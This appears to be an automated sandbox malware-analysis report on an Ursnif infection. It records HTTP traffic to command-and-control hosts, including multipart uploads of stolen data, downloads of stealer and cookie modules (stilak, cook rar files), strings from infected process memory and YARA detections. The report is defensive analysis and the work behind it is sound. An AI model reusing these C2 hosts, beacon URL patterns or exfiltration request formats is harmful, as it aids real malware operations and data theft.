                      Source: global trafficHTTP traffic detected: POST /images/x2n_2BZq/cMTCmy3PTwcmYJsQtcFfdmd/RGHbCfH0Mi/_2F2XXxRKDznMaDCu/6VijCL7TOw6A/_2FZwep2qr_/2FWEPkZM5AVXte/9aqioax34nJsL5Jif0tvs/L_2FZYT61ziDpxF7/LpFCetnlC9m_2Bt/oUT730x_2F0HUFQM3Y/XzNhPma_2/B16XqKLqfQsgSGMPR6I2/0aqjgbQwdUeD2pbxvCW/nFGCHfIsUA4BQ8wKgww64R/38SNs6vk5dFLz/lF2ZfIKN/ONI_2FioD0xOFaZ_2BUESxI/wtoW_2F78Wali9Dqxz_/2F8R.bmp HTTP/1.1Content-Type: multipart/form-data; boundary=315998012542640097891134987170User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: cabrioxmdes.atContent-Length: 387Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 33 31 35 39 39 38 30 31 32 35 34 32 36 34 30 30 39 37 38 39 31 31 33 34 39 38 37 31 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 70 6c 6f 61 64 5f 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 38 34 43 32 2e 62 69 6e 22 0d 0a 0d 0a c4 3a 05 dc 08 18 e8 11 ed cf a4 0c ab c1 02 66 7d 8c 42 f8 e1 54 84 bf 45 eb 69 35 db 71 df 5a 7f 36 2e 39 a9 d4 bc 44 3f a5 2d 4f e4 77 6d 4d e9 fd cb 9f 34 d3 52 90 c7 ef 96 8b 3a 51 52 33 1e 4e d7 58 12 20 f0 a1 ba 72 e2 a4 65 f4 9c 4a ba eb 0d a4 54 4a 8d a0 e6 5c df 1a 39 1e 99 48 4e bf 06 66 06 d2 5a c9 d5 25 ba ab df 3a 46 79 a9 9f 83 41 05 5b 19 68 e6 69 3c fa 64 22 5f d7 f5 51 fa 1a 19 70 83 6d 10 60 e4 02 29 a5 fe f7 70 0e ed 73 f8 c2 02 d4 cc d9 86 fb 43 90 cd b5 d4 4d 65 6e f2 f6 86 52 19 54 55 bf bc d5 03 6f 02 d5 2c db 53 12 f0 55 f2 6b bf 87 b2 cc aa 53 11 20 16 69 ac 25 cc fe 66 c8 96 93 c4 85 7f df 36 8f ff e7 40 65 fe 99 ce cc 93 52 c1 0b 35 49 c7 bb e4 4a 3a 27 ce 10 6b ec c7 39 84 5a 65 f9 0d 0a 2d 2d 33 31 35 39 39 38 30 31 32 35 34 32 36 34 30 30 39 37 38 39 31 31 33 34 39 38 37 31 37 30 2d 2d 0d 0a Data Ascii: --315998012542640097891134987170Content-Disposition: form-data; name="upload_file"; filename="84C2.bin":f}BTEi5qZ6.9D?-OwmM4R:QR3NX reJTJ\9HNfZ%:FyA[hi<d"_Qpm`)psCMenRTUo,SUkS i%f6@eR5IJ:'k9Ze--315998012542640097891134987170--
                      Source: Joe Sandbox ViewASN Name: LVLT-10753US LVLT-10753US
                      Source: Joe Sandbox ViewASN Name: CJNET-ASCheiljedangCoIncKR CJNET-ASCheiljedangCoIncKR
                      Source: Joe Sandbox ViewIP Address: 116.121.62.237 116.121.62.237
                      Source: rundll32.exe, 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
                      Source: rundll32.exe, 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
                      Source: powershell.exe, 00000014.00000003.458378624.0000012326C3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.osofts/Microt0
                      Source: RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472890650.0000015723D2D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://curlmyip.net
                      Source: RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472890650.0000015723D2D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://curlmyip.netJv1GYc8A8hCBIeVDfile://c:
                      Source: RuntimeBroker.exe, 0000002D.00000000.534314941.000001FFC4684000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.515347260.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.528508008.000001FFC4676000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: rundll32.exe, 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                      Source: RuntimeBroker.exe, 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io/ip
                      Source: RuntimeBroker.exe, 0000002D.00000000.490948981.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.779749561.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.496159041.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532689396.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.508232045.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502615192.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.cmg
                      Source: RuntimeBroker.exe, 0000002D.00000000.490948981.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.779749561.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.496159041.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532689396.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.508232045.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502615192.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.ux
                      Source: RuntimeBroker.exe, 0000002D.00000000.490948981.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.779749561.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.496159041.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532689396.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.508232045.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502615192.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobp/
                      Source: RuntimeBroker.exe, 0000002D.00000000.490948981.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000002.779749561.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.496159041.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.532689396.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.508232045.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502615192.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.micro/1
                      Source: powershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000014.00000002.486281896.000001230EA7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000014.00000002.472249997.000001230E871000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: RuntimeBroker.exe, 0000002D.00000000.495890891.000001FFC2040000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.502279870.000001FFC2040000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.495848781.000001FFC202A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://twitter.com/spotify
                      Source: powershell.exe, 00000014.00000002.486281896.000001230EA7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: RuntimeBroker.exe, 0000002D.00000000.534314941.000001FFC4684000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.515347260.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.528508008.000001FFC4676000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: powershell.exe, 00000014.00000002.486281896.000001230EA7F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000014.00000002.574448524.000001231E8D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://support.hotspotshield.com/
                      Source: RuntimeBroker.exe, 0000002D.00000000.534314941.000001FFC4684000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.515347260.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.528508008.000001FFC4676000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: RuntimeBroker.exe, 0000002D.00000000.534314941.000001FFC4684000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.515347260.000001FFC4676000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.527626651.000001FFC2129000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.528508008.000001FFC4676000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.hotspotshield.com/terms/
                      Source: RuntimeBroker.exe, 0000002D.00000000.513700649.000001FFC2129000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.pango.co/privacy
                      Source: RuntimeBroker.exe, 0000002D.00000002.779649889.000001FFC2120000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: unknownDNS traffic detected: queries for: resolver1.opendns.com
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D1CA5 ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,2_2_036D1CA5
                      Source: global trafficHTTP traffic detected: GET /drew/VaQ3pTys7Q2R6kpf/_2FIc_2F8CXvB3Z/iOcDCMv_2Bzt_2BkvD/0oAvhggmG/_2Fl1lo2G6zaBPziefOU/0weuiBbGeNMoLKM6iCO/t_2BCeHyFsnS9bYnhwNoEp/71L2csZUwuj6M/Di72h_2F/YKcRH2nZoqJfjSIVybnSQum/ojRn6CbyHg/HZSkJJ16taI_2BtJ_/2BPgmXmwBiuC/GeqX1VmOJwL/BLm5b43yKc8DM1/cAyjDLhuSh3YL8e2h3G86/An0inHEid52NS1pJ/fzGWg5Z6i/S.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/ftkCw_2FHRlZ2H4Ez/kZzLPSWW1EjO/vrmRPaaHdKz/qSrMackZ3zyqc0/VWwRh_2FwCauXlH76SpSQ/WebWjWKotWlEjZol/i0khlMGcdRnqbLJ/HlNBrT1E6GXaxDAWHo/UE921lN_2/FjqHF75OT4VsLwnjVixS/PbEwWP4onYE8hLJvBBX/d_2BgNcvh2ZXGjR5_2FyXa/S5_2BQHrje5lp/MVCT87wg/yCb3LwnNfDTI2igwyNHJuPu/wEyNxQ1wIj/6Ok6nHxwE/MHgaOPodjh/7.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /drew/j2JffNlXTHLPSjvkab/vvawbyEnZ/Hwlvs3aqIXBaZtIhRcgj/4HXnxsMpDrDAMvyWm_2/FmVqdMEPLr3zfDmaxNGUay/bz_2BSMy1l2QZ/EUwY7mKI/BhGCRzr1OkkgVWxbqU3mkVE/wA3v0qd0nJ/5B7wfgqElhGpmz3sa/_2F6sQ8OT_2B/8xTtmUQcdaG/oTkIYSJR4gLWwl/QQTNVlqw4bQdTnzAZ6CQ7/k1kym0P_2B_2FUsc/x2oonw84wvEvNXM/7_2BWWPnJGDR/PuJeNv7kx/T.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /stilak32.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.127Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /stilak64.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.127Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /cook32.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.127Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /cook64.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.127Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /images/V0NO_2B_2/BKtxKUyqNZPWTGW_2Fsb/gcra1vUcqfsugEwbqkg/clC4xOvGOnv1IfCbC3KpDN/55o4c2l5_2FQ5/A5h2Nudl/_2BMxe_2B5DeFfkUNA5tHFs/S3JUh8OxeK/2_2FH31SGSIQagA1v/1cdYZqzVHkrq/508837BCT1F/BqNIRlNPeT4DuE/7TejdrPxV03GXRoV_2Bn_/2BLetz9nfjFhAFKH/XzqzBZbDgeQBfEL/knvoVinzLGANv8j5GP/MiBxeoPgM/h0e0hiZpA4rDs4gKFEOR/z8BKZois5KcoiHgGkl6/XYwiOQ0Qo28lWHm/byQpQm.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: cabrioxmdes.atConnection: Keep-AliveCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.189.151.28
                      Source: RuntimeBroker.exe, 0000002D.00000000.495890891.000001FFC2040000.00000004.00000001.00020000.00000000.sdmp, RuntimeBroker.exe, 0000002D.00000000.495848781.000001FFC202A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: Like us on Facebook: http://www.facebook.com/spotify equals www.facebook.com (Facebook)
                      Source: RuntimeBroker.exe, 0000002D.00000000.502279870.000001FFC2040000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: n Facebook: http://www.facebook.com/spotify equals www.facebook.com (Facebook)
                      Source: unknownHTTP traffic detected: POST /images/ycZgts7gGB1TTI_2BJ/kAFzWH5dO/EouFwEOlBnMQFd_2B9cm/hFllbR62yV2D6DpnFIT/1m7iL_2BNn_2FiW_2Fey46/UbiTO8_2BKiyZ/X_2Fw6C8/_2BYemffpjXv9AYl0VWdt5P/DII_2F9NDv/YDhvS6DNSnB9Ol87V/O37_2FvxkOTf/eEAAdQaaXJB/BDgwSc3qOdxCUN/5Mw_2FSE2hFdSZTrFlwZP/7mWxeoDw9vW5V8uP/HsY9e6csLMEHi74/FnD5yUP5tDxrs5O87k/gamDdyFb5/q42.bmp HTTP/1.1Content-Type: multipart/form-data; boundary=318247997342640097891112487322User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: cabrioxmdes.atContent-Length: 563Connection: Keep-AliveCache-Control: no-cache

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322984868.000000000576C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274118654.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274312246.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274347577.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274283989.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274051962.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.320061792.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274249118.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274172697.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322240934.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274335301.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2284, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6680, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 7000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5180, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4724, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4960, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.52f94a0.10.raw.unpack, type: UNPACKEDPE
